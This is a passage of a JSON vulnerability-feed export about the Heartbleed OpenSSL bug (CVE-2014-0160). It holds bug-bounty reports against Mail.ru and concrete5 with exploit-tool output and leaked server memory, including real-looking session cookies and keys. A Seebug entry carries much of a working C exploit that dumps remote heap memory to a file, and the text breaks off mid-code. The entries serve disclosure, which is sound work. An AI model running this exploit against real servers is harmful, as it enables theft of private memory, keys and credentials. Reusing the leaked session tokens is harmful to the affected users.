\u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0430\u0441\u0442\u044c \u0432\u0430\u0448\u0435\u0439 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u043a \u044d\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0438 \u044f \u0440\u0430\u0434\u0438 \u0447\u0438\u0441\u0442\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430.",
            "modified": "2014-12-10T19:29:15",
            "published": "2014-10-23T15:12:13",
            "id": "H1:32570",
            "href": "https://hackerone.com/reports/32570",
            "type": "hackerone",
            "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)",
            "cvss": {
                "score": 0.0,
                "vector": "NONE"
            }
        },
        {
            "lastseen": "2018-08-04T10:02:55",
            "bulletinFamily": "bugbounty",
            "bounty": 0.0,
            "cvelist": [],
            "description": "Pls see attachment files for details:\r\npython ssltest.py concrete5.org 443|more\r\n\r\nimpact: critical, pls patch it ASAP\r\n\r\nReferences:\r\nhttps://www.openssl.org/news/secadv_20140407.txt\r\nhttp://heartbleed.com\r\nhttps://github.com/openssl/openssl/commit/96db9023b881d7cd9f379b0c154650d6c108e9a3\r\n~g4mm4\r\nhttps://twitter.com/xchym",
            "modified": "2014-04-09T00:37:33",
            "published": "2014-04-08T11:01:31",
            "id": "H1:6475",
            "href": "https://hackerone.com/reports/6475",
            "type": "hackerone",
            "title": "concrete5: https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)",
            "cvss": {
                "score": 0.0,
                "vector": "NONE"
            }
        },
        {
            "lastseen": "2018-11-23T12:55:41",
            "bulletinFamily": "bugbounty",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "bounty": 150.0,
            "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py scfbp.tng.mail.ru\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: scfbp.tng.mail.ru:443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: scfbp.tng.mail.ru:443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\[email protected][...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.........Y.[.uu.n.~J....4.F.P.<.5}b.n\r\n.................................3t.............http/1.1.spdy/3.1.h2-14uP.........\r\n.............WXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1\r\nHost: 195.211.20.229\r\nAccept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1\r\n",
            "modified": "2015-09-13T12:16:27",
            "id": "H1:49139",
            "href": "https://hackerone.com/reports/49139",
            "published": "2015-02-25T07:49:11",
            "type": "hackerone",
            "title": "Mail.ru: scfbp.tng.mail.ru: Heartbleed",
            "cvss": {
                "score": 0.0,
                "vector": "NONE"
            }
        },
        {
            "lastseen": "2018-11-23T12:55:41",
            "bulletinFamily": "bugbounty",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "bounty": 150.0,
            "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py 185.30.178.33 -p 1443\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: 185.30.178.33:1443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: 185.30.178.33:1443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\[email protected][...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.......X-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36\r\nReferer: https://adm.riotzone.net:1443/webadm/\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8,ru;q=0.6\r\nCookie: fbm_335418533141749=base_domain=.riotzone.net; weblang=de; auser=1177778; atype=my; asess=2d53c33bbbb985848534e390323c0630; ashow=100007781204577@facebook; nofoo=1; anick=LaVerdad; aserv=1; level=50; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n\r\n.....\r\nSM....)..Z..............b....o...~..^..DF..4......g..%.E.EaVHhJUTZhak8xNWdJYTRIZExkVXpuSVUxVmIwZHVrSV9ZTWw0bkpEQktHVkQyQ3Fpb190MGZFclhMYVg2bjVBMTZnVkZpMWlHMzJ3VFVPNTlvZFR2VU5QWnBjZXBRaVh5OTNHdVR5cEJlR2NCUzhENWR5WXJTcU1CNHRteTl2Q01YTUhjQ212STFkRzZid0poaCIsImlzc3VlZF9hdCI6MTQyMTYwMjM1NCwidXNlcl9pZCI6IjEwMDAwNzc4MTIwNDU3NyJ9; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmb=72033936.2.10.1421602346; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n",
            "modified": "2015-09-13T12:13:15",
            "id": "H1:44294",
            "href": "https://hackerone.com/reports/44294",
            "published": "2015-01-19T13:54:12",
            "type": "hackerone",
            "title": "Mail.ru: Heartbleed: my.com (185.30.178.33) port 1433",
            "cvss": {
                "score": 0.0,
                "vector": "NONE"
            }
        }
    ],
    "seebug": [
        {
            "lastseen": "2017-11-19T14:03:33",
            "description": "No description provided by source.",
            "published": "2014-07-01T00:00:00",
            "title": "Heartbleed OpenSSL - Information Leak Exploit (1)",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-07-01T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-86061",
            "id": "SSV:86061",
            "sourceData": "\n                                                /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65535 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd&#39;s to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ &#60;3 &#60;3 &#60;3 heart bleed &#60;3 &#60;3 &#60;3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file &#39;out&#39;\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file &#39;out&#39;\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file &#39;out&#39;\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file &#39;out&#39;\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file &#39;out&#39;\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip  \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with &#34;gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto&#34; \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n*   http://www.mdsec.co.uk\r\n*\r\n*/\r\n#include &#60;stdio.h&#62;\r\n#include &#60;stdint.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;string.h&#62;\r\n#include &#60;unistd.h&#62;\r\n#include &#60;getopt.h&#62;\r\n#include &#60;signal.h&#62;\r\n#include &#60;netdb.h&#62;\r\n#include &#60;fcntl.h&#62;\r\n#include &#60;sys/socket.h&#62;\r\n#include &#60;sys/types.h&#62;\r\n#include &#60;netinet/in.h&#62;\r\n#include &#60;inttypes.h&#62;\r\n#include &#60;openssl/bio.h&#62;\r\n#include &#60;openssl/ssl.h&#62;\r\n#include &#60;openssl/err.h&#62;\r\n#include &#60;openssl/evp.h&#62;\r\n#include &#60;openssl/tls1.h&#62;\r\n#include &#60;openssl/rand.h&#62;\r\n#include &#60;openssl/buffer.h&#62;\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))&#60;&#60; 8)| \\\r\n\t\t(((unsigned int)(c[1]))    )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)&#62;&#62; 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s)    )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n  unsigned char type;\r\n  short version;\r\n  unsigned int length;\r\n  unsigned char hbtype;\r\n  unsigned int payload_length;\r\n  void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n        struct sockaddr_in sa;\r\n        host = gethostbyname(server);\r\n        sd = socket(AF_INET, SOCK_STREAM, 0);\r\n        if(sd==-1){\r\n\t\tprintf(&#34;[!] cannot create socket\\n&#34;);\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n        sa.sin_port = htons(port);\r\n        sa.sin_addr = *((struct in_addr *) host-&#62;h_addr);\r\n        bzero(&(sa.sin_zero),8);\r\n\tprintf(&#34;[ connecting to %s %d/tcp\\n&#34;,server,port);\r\n        ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf(&#34;[ connected to %s %d/tcp\\n&#34;,server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf(&#34;[!] FATAL: could not connect to %s %d/tcp\\n&#34;,server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n    \t\tprintf(&#34;[!] cannot create socket\\n&#34;);\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host-&#62;h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n    \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf(&#34;[!] cannot bind socket\\n&#34;);\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\n\r\nvoid ssl_init(){\r\n        SSL_load_error_strings();\r\n        SSL_library_init();\r\n        OpenSSL_add_all_digests();\r\n        OpenSSL_add_all_algorithms();\r\n        OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n        connection *c;\r\n\tc = malloc(sizeof(connection));\r\n        if(c==NULL){\r\n\t\tprintf(&#34;[ error in malloc()\\n&#34;);\r\n\t\texit(0);\r\n\t}\r\n\tc-&#62;socket = sd;\r\n        c-&#62;sslHandle = NULL;\r\n        c-&#62;sslContext = NULL;\r\n        c-&#62;sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c-&#62;sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n        if(c-&#62;sslContext==NULL)\r\n                ERR_print_errors_fp(stderr);\r\n        c-&#62;sslHandle = SSL_new(c-&#62;sslContext);\r\n        if(c-&#62;sslHandle==NULL)\r\n                ERR_print_errors_fp(stderr);\r\n        if(!SSL_set_fd(c-&#62;sslHandle,c-&#62;socket))\r\n                ERR_print_errors_fp(stderr);\r\n        if(SSL_connect(c-&#62;sslHandle)!=1)\r\n                ERR_print_errors_fp(stderr);\r\n        if(!c-&#62;sslHandle-&#62;tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n                c-&#62;sslHandle-&#62;tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n                printf(&#34;[ warning: heartbeat extension is unsupported (try anyway)\\n&#34;);\r\n        }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n        connection *c;\r\n        char* buf;\r\n\tbuf = malloc(4096);\r\n        if(buf==NULL){\r\n                printf(&#34;[ error in malloc()\\n&#34;);\r\n                exit(0);\r\n        }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n                printf(&#34;[ error in malloc()\\n&#34;);\r\n                exit(0);\r\n        }\r\n\tc-&#62;socket = sd;\r\n        c-&#62;sslHandle = NULL;\r\n        c-&#62;sslContext = NULL;\r\n        c-&#62;sslContext = SSL_CTX_new(SSLv23_server_method());\r\n        if(c-&#62;sslContext==NULL)\r\n                ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c-&#62;sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c-&#62;sslContext);\r\n\tSSL_CTX_use_certificate_file(c-&#62;sslContext, &#34;./server.crt&#34;, SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c-&#62;sslContext, &#34;./server.key&#34;, SSL_FILETYPE_PEM);       \r\n\tif(!SSL_CTX_check_private_key(c-&#62;sslContext)){\r\n\t\tprintf(&#34;[!] FATAL: private key does not match the certificate public key\\n&#34;);\r\n\t\texit(0);\r\n\t}\r\n\tc-&#62;sslHandle = SSL_new(c-&#62;sslContext);\r\n        if(c-&#62;sslHandle==NULL)\r\n                ERR_print_errors_fp(stderr);\r\n        if(!SSL_set_fd(c-&#62;sslHandle,c-&#62;socket))\r\n                ERR_print_errors_fp(stderr);\r\n        int rc = SSL_accept(c-&#62;sslHandle);\r\n\tprintf (&#34;[ SSL connection using %s\\n&#34;, SSL_get_cipher (c-&#62;sslHandle));\r\n\tbytes = SSL_read(c-&#62;sslHandle, buf, 4095);\r\n\tprintf(&#34;[ recieved: %d bytes - showing output\\n%s\\n[\\n&#34;,bytes,buf);\r\n\tif(!c-&#62;sslHandle-&#62;tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n                c-&#62;sslHandle-&#62;tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n                printf(&#34;[ warning: heartbeat extension is unsupported (try anyway)\\n&#34;);\r\n        }\r\n        return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2;  \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = &#34;EHLO test\\n&#34;;\r\n\t\t\tline2 = &#34;STARTTLS\\n&#34;;\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = &#34;CAPA\\n&#34;;\r\n\t\t\tline2 = &#34;STLS\\n&#34;;\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = &#34;a001 CAPB\\n&#34;;\r\n\t\t\tline2 = &#34;a002 STARTTLS\\n&#34;;\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t        if(buffer==NULL){\r\n                \tprintf(&#34;[ error in malloc()\\n&#34;);\r\n                \texit(0);\r\n\t        }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf(&#34;[ banner: %s&#34;,buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf(&#34;%s\\n&#34;,buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf(&#34;%s\\n&#34;,buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n        int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n                printf(&#34;[ error in malloc()\\n&#34;);\r\n                exit(0);\r\n        }\r\n\tp = buf;\r\n        *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf(&#34;[ setting heartbeat payload_length to %u\\n&#34;,type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf(&#34;[ &#60;3 &#60;3 &#60;3 heart bleed &#60;3 &#60;3 &#60;3\\n&#34;);\r\n        ret = ssl3_write_bytes(c-&#62;sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n        OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n        int ssl_major,ssl_minor,al;\r\n        int enc_err,n,i;\r\n        SSL3_RECORD *rr;\r\n        SSL_SESSION *sess;\r\n\tSSL* s;\r\n        unsigned char md[EVP_MAX_MD_SIZE];\r\n        short version;\r\n        unsigned mac_size, orig_len;\r\n        size_t extra;\r\n        rr= &(c-&#62;sslHandle-&#62;s3-&#62;rrec);\r\n        sess=c-&#62;sslHandle-&#62;session;\r\n        s = c-&#62;sslHandle;\r\n        if (c-&#62;sslHandle-&#62;options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n                extra=SSL3_RT_MAX_EXTRA;\r\n        else\r\n                extra=0;\r\n        if ((s-&#62;rstate != SSL_ST_READ_BODY) ||\r\n                (s-&#62;packet_length &#60; SSL3_RT_HEADER_LENGTH)) {\r\n                        n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s-&#62;s3-&#62;rbuf.len, 0);\r\n                        if (n &#60;= 0)\r\n                                goto apple; \r\n                        s-&#62;rstate=SSL_ST_READ_BODY;\r\n                        p=s-&#62;packet;\r\n                        rr-&#62;type= *(p++);\r\n                        ssl_major= *(p++);\r\n                        ssl_minor= *(p++);\r\n                        version=(ssl_major&#60;&#60;8)|ssl_minor;\r\n                        n2s(p,rr-&#62;length);\r\n\t\t\tif(rr-&#62;type==24){\r\n\t\t\t\tprintf(&#34;[ heartbeat returned type=%d length=%u\\n&#34;,rr-&#62;type, rr-&#62;length);\r\n\t\t\t\tif(rr-&#62;length &#62; 16834){\r\n\t\t\t\t\tprintf(&#34;[ error: got a malformed TLS length.\\n&#34;);\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf(&#34;[ incorrect record type=%d length=%u returned\\n&#34;,rr-&#62;type,rr-&#62;length);\r\n\t\t\t\ts-&#62;packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets &#62; 3){\r\n\t\t\t\t\tprintf(&#34;[ error: too many bad packets recieved\\n&#34;);\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n        }\r\n        if (rr-&#62;length &#62; s-&#62;packet_length-SSL3_RT_HEADER_LENGTH){\r\n                i=rr-&#62;length;\r\n                n=ssl3_read_n(s,i,i,1);\r\n                if (n &#60;= 0) goto apple; \r\n        }\r\n\tprintf(&#34;[ decrypting SSL packet\\n&#34;);\r\n        s-&#62;rstate=SSL_ST_READ_HEADER; \r\n        rr-&#62;input= &(s-&#62;packet[SSL3_RT_HEADER_LENGTH]);\r\n        rr-&#62;data=rr-&#62;input;\r\n        tls1_enc(s,0);\r\n        if((sess != NULL) &&\r\n            (s-&#62;enc_read_ctx != NULL) &&\r\n            (EVP_MD_CTX_md(s-&#62;read_hash) != NULL))\r\n                {\r\n                unsigned char *mac = NULL;\r\n                unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n                mac_size=EVP_MD_CTX_size(s-&#62;read_hash);\r\n                OPENSSL_assert(mac_size &#60;= EVP_MAX_MD_SIZE);\r\n                orig_len = rr-&#62;length+((unsigned int)rr-&#62;type&#62;&#62;8);\r\n                if(orig_len &#60; mac_size ||\r\n                  (EVP_CIPHER_CTX_mode(s-&#62;enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n                   orig_len &#60; mac_size+1)){\r\n                        al=SSL_AD_DECODE_ERROR;\r\n                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n                }\r\n                if (EVP_CIPHER_CTX_mode(s-&#62;enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n                        mac = mac_tmp;\r\n                        ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n                        rr-&#62;length -= mac_size;\r\n                }\r\n                else{\r\n                        rr-&#62;length -= mac_size;\r\n                        mac = &rr-&#62;data[rr-&#62;length];\r\n                }\r\n                i = tls1_mac(s,md,0);\r\n                if (i &#60; 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n                        enc_err = -1;\r\n                if (rr-&#62;length &#62; SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n                        enc_err = -1;\r\n                }\r\n        if(enc_err &#60; 0){\r\n                al=SSL_AD_BAD_RECORD_MAC;\r\n                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n                goto apple;\r\n        }\r\n        if(s-&#62;expand != NULL){\r\n                if (rr-&#62;length &#62; SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n                        al=SSL_AD_RECORD_OVERFLOW;\r\n                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n                        goto apple;\r\n                        }\r\n                if (!ssl3_do_uncompress(s)) {\r\n                        al=SSL_AD_DECOMPRESSION_FAILURE;\r\n                        SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n                        goto apple;\r\n                        }\r\n                }\r\n        if (rr-&#62;length &#62; SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n                al=SSL_AD_RECORD_OVERFLOW;\r\n                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n                goto apple;\r\n        }\r\n        rr-&#62;off=0;\r\n        s-&#62;packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s-&#62;s3-&#62;rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) &#60;&#60; 8 | (heartbleed_len & 0xff00) &#62;&#62; 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf(&#34;[ heartbleed leaked length=%u\\n&#34;,heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z&#60;rr-&#62;length; z++) printf(&#34;%02X%c&#34;,rr-&#62;data[z],((z+1)%16)?&#39; &#39;:&#39;\\n&#39;); }\r\n                printf(&#34;\\n&#34;);\r\n        }\r\n\tleakbytes-=rr-&#62;length;\r\n\tif(leakbytes &#62; 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf(&#34;[ final record type=%d, length=%u\\n&#34;, rr-&#62;type, rr-&#62;length);\r\n\tint output = s-&#62;s3-&#62;rrec.length-3;\r\n\tif(output &#62; 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t        if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s-&#62;s3-&#62;rrec.data+3,s-&#62;s3-&#62;rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf(&#34;[ wrote %d bytes of heap to file &#39;%s&#39;\\n&#34;,s-&#62;s3-&#62;rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s-&#62;s3-&#62;rrec.data+3,s-&#62;s3-&#62;rrec.length);\r\n\t\t\tprintf(&#34;[ wrote %d bytes of heap to file &#39;%s&#39;\\n&#34;,s-&#62;s3-&#62;rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf(&#34;[ nothing from the heap to write\\n&#34;);\r\n\t}\r\n\treturn;\r\napple:\r\n        printf(&#34;[ problem handling SSL record packet - wrong type?\\n&#34;);\r\n\tbadpackets++;\r\n\tif(badpackets &#62; 3){\r\n\t\tprintf(&#34;[ error: too many bad 